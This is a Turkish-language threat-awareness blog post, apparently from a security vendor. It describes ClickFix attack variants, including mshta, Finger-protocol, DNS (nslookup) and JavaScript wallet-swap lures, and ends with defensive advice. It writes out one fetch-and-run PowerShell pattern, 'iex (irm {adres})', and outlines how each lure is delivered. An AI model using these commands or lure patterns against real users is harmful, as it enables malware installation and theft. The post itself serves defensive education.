ClickFix’in varyasyonları

Yaklaşık bir yıl önce, saldırganlar arasında popülerlik kazanan ClickFix tekniği hakkında bir yazı yayınladık. ClickFix kullanılarak yapılan saldırıların özü, çeşitli bahanelerle kurbanı bilgisayarında kötü amaçlı bir komut çalıştırmaya ikna etmeye dayanır. Yani, siber güvenlik çözümleri açısından, aktif kullanıcı adına ve onun ayrıcalıklarıyla çalıştırılır.

Bu tekniğin ilk kullanımlarında, siber suçlular kurbanları bir sorunu gidermek veya bir captcha’yı geçmek için bir komut çalıştırmaları gerektiğine ikna etmeye çalışmışlardı ve çoğu durumda kötü amaçlı komut bir PowerShell komut dosyasıydı. Ancak o zamandan beri, saldırganlar kullanıcıların dikkat etmesi gereken bir dizi yeni hile ve ayrıca göz önünde bulundurulması gereken bir dizi yeni kötü amaçlı yük teslim varyantı geliştirdiler.

mshta.exe kullanımı

Geçen yıl, Microsoft uzmanları Booking.com ile çalışan otel sahiplerini hedef alan siber saldırılar hakkında bir rapor yayınladı. Saldırganlar, hizmetten sahte bildirimler veya konuklardan gelmiş gibi görünen ve bir incelemeye dikkat çeken e-postalar gönderdi. Her iki durumda da, e-posta Booking.com’u taklit eden bir web sitesine bağlantı içeriyordu ve kurbandan Çalıştır menüsü aracılığıyla bir kod çalıştırarak robot olmadığını kanıtlamasını istiyordu.

Bu saldırı ile ClickFix arasında iki temel fark vardır. İlk olarak, kullanıcıdan dizgiyi kopyalaması istenmez (sonuçta, kod içeren bir dizgi bazen şüphe uyandırabilir). Bu kod, kötü niyetli site tarafından; muhtemelen kullanıcı reCAPTCHA mekanizmasını taklit eden bir onay kutusuna tıkladığında, pano (clipboard) arabelleğine kopyalanır. İkincisi, kötü amaçlı dize, HTML ile yazılmış uygulamaları çalıştırmaya yarayan yasal mshta.exe yardımcı programını çağırır. Saldırganların sunucusuyla bağlantı kurar ve kötü amaçlı yükü yürütür.

TikTok ve PowerShell’de yönetici ayrıcalıklarıyla ilgili video

BleepingComputer, Ekim 2025’te TikTok videolarındaki talimatlar aracılığıyla kötü amaçlı yazılım yayan bir saldırı kampanyası hakkında bir makale yayınladı. Özel yazılımları ücretsiz olarak etkinleştirme konusundaki video eğitimlerini taklit eden söz konusu videolarda temel olarak, PowerShell’i yönetici haklarıyla çalıştırıp ardından iex (irm {adres}) komutunu çalıştırma gerekliliği hakkında tavsiyeler verilir. Burada, irm komutu saldırganlar tarafından kontrol edilen bir sunucudan kötü amaçlı bir komut dosyası indirir ve iex (Invoke-Expression) komutu bunu çalıştırır. Bunun üzerine komut dosyası, kurbanın bilgisayarına bir bilgi hırsızı kötü amaçlı yazılım indirir.

Finger iletişim kuralını kullanma

ClickFix saldırısının bir başka sıra dışı varyantı, tanıdık captcha hilesi kullansa da kötü amaçlı komut dosyası eski Finger iletişim kuralını kullanır. Aynı adlı yardımcı program, herkesin uzak bir sunucudaki belirli bir kullanıcı hakkında veri talep etmesine olanak tanır. Bu iletişim kuralı günümüzde nadiren kullanılmaktadır, ancak Windows, macOS ve bir dizi Linux tabanlı sistem tarafından hala desteklenmektedir.

Kullanıcı, komut satırı arabirimini açmaya ve bunu kullanarak saldırganların sunucusuyla Finger protokolü (TCP portu 79 kullanılarak) üzerinden bağlantı kuran bir komut çalıştırmaya ikna edilir. İletişim kuralı yalnızca metin bilgilerini aktarır, ancak bu, kurbanın bilgisayarına başka bir komut dosyası indirmek için yeterlidir ve bu komut dosyası daha sonra kötü amaçlı yazılımı yükler.

CrashFix varyantı

ClickFix’in bir başka varyantı, daha sofistike sosyal mühendislik kullanmasıyla farklılık gösterir. Web sayfalarındaki reklam afişleri, izleyiciler, kötü amaçlı yazılımlar ve diğer istenmeyen içerikleri engellemek için bir araç arayan kullanıcılara yönelik bir saldırıda kullanılmıştı. Google Chrome için uygun bir uzantı ararken, kurbanlar NexShield – Advanced Web Guardian adlı bir program buldular. Bu program, gerçekte çalışan bir yazılımın kopyasıydı, ancak bir noktada tarayıcıyı çökertti ve algılanan bir güvenlik sorunu ve hatayı düzeltmek için bir “tarama” çalıştırılması gerektiğine dair sahte bir bildirim görüntüledi. Kullanıcı kabul ederse, Çalıştır menüsünü açma ve uzantının önceden panoya kopyaladığı bir komutu yürütme talimatlarını alırdı.

Komut, tanıdık finger.exe dosyasını geçici bir dizine kopyaladı, adını ct.exe olarak değiştirdi ve ardından saldırganın adresiyle çalıştırdı. Saldırının geri kalanı yukarıda bahsedilen olayla aynıydı. Finger iletişim kuralı talebine yanıt olarak, bir uzaktan erişim Truva atı (bu durumda ModeloRAT) çalıştıran ve yükleyen kötü amaçlı bir komut dosyası gönderildi.

DNS araması yoluyla kötü amaçlı yazılım dağıtımı

Microsoft Threat Intelligence ekibi, normalden biraz daha karmaşık bir ClickFix saldırı varyantını da paylaştı. Ne yazık ki, sosyal mühendislik hilesi hakkında bilgi vermediler, ancak kötü amaçlı yükü teslim etme yöntemi oldukça ilginç. Muhtemelen kurumsal ortamda saldırının tespitini zorlaştırmak ve kötü amaçlı altyapının ömrünü uzatmak için saldırganlar ek bir adım attılar; saldırganlar tarafından kontrol edilen bir DNS sunucusuyla iletişime geçtiler.

Yani, kurban bir şekilde kötü amaçlı bir komutu kopyalayıp çalıştırmaya ikna edildikten sonra, yasal nslookup yardımcı programı aracılığıyla kullanıcı adına DNS sunucusuna bir talep gönderilir ve example.com etki alanı için veri talep edilir. Komut, saldırganlar tarafından kontrol edilen belirli bir DNS sunucusunun adresini içerir. Diğer şeylerin yanı sıra, kötü amaçlı komut dosyası içeren bir dize döndüren bir yanıt döndürür ve bu da nihai yükü indirir (bu saldırıda yine ModeloRAT).

Kripto para yemi ve JavaScript yükü

Bir sonraki saldırı türü, çok aşamalı sosyal mühendislik açısından ilginçtir. Pastebin’deki yorumlarda, saldırganlar Swapzone.io kripto para borsası hizmetindeki iddia edilen bir kusur hakkında aktif olarak bir mesaj yaydılar. Kripto para sahipleri, dolandırıcılar tarafından oluşturulan ve bu açığı nasıl kullanacaklarına ve birkaç gün içinde 13.000 $’a kadar kazanç sağlayabileceklerine dair tüm talimatları içeren bir kaynağı ziyaret etmeye davet edildiler.

Talimatlar, hizmetin kusurlarının daha uygun bir kurdan kripto para birimi takası yapmak için nasıl kullanılabileceğini açıklamaktaydı. Bunu yapmak için, kurbanın Chrome tarayıcısında hizmetin web sitesini açması, adres çubuğuna manuel olarak “javascript:” yazması ve ardından saldırganların web sitesinden kopyaladığı JavaScript komut dosyasını yapıştırıp çalıştırması gerekiyordu. Gerçekte, elbette, komut dosyası döviz kurlarını hiçbir şekilde etkileyemez; sadece Bitcoin cüzdan adreslerini değiştirir ve kurban gerçekten bir şey takas etmeye çalışırsa, fonları saldırganların hesaplarına aktarır.

Şirketinizi ClickFix saldırılarından nasıl koruyabilirsiniz?

ClickFix tekniğini kullanan en basit saldırılar, iş cihazlarında [Win] + [R]  tuş kombinasyonunu engelleyerek önlenebilir. Ancak, listelenen örneklerden de görüldüğü gibi, kullanıcıların kendileri kötü amaçlı kod çalıştırmaları istenen tek saldırı türü bu değildir.

Bu nedenle, temel tavsiye çalışanların siber güvenlik bilincini artırmaktır. Birisi onlardan sistemde olağandışı işlemler yapmalarını ve/veya bir yere kod kopyalayıp yapıştırmalarını isterse, bunun çoğu durumda siber suçluların kullandığı bir hile olduğunu açıkça anlamaları gerekir. Güvenlik farkındalık eğitimi, Kaspersky Automated Security Awareness Platform kullanılarak düzenlenebilir.

Ayrıca, bu tür siber saldırılara karşı korunmak için şunları öneririz:

• Tüm kurumsal cihazlarda güvenilir koruma kullanma.
• XDR çözümü kullanarak şirket ağındaki şüpheli etkinlikleri izleme.
• İç kaynaklar yetersizse, tehditleri tespit etmek ve bunlara hızlı bir şekilde yanıt vermek için harici bir hizmet kullanmak.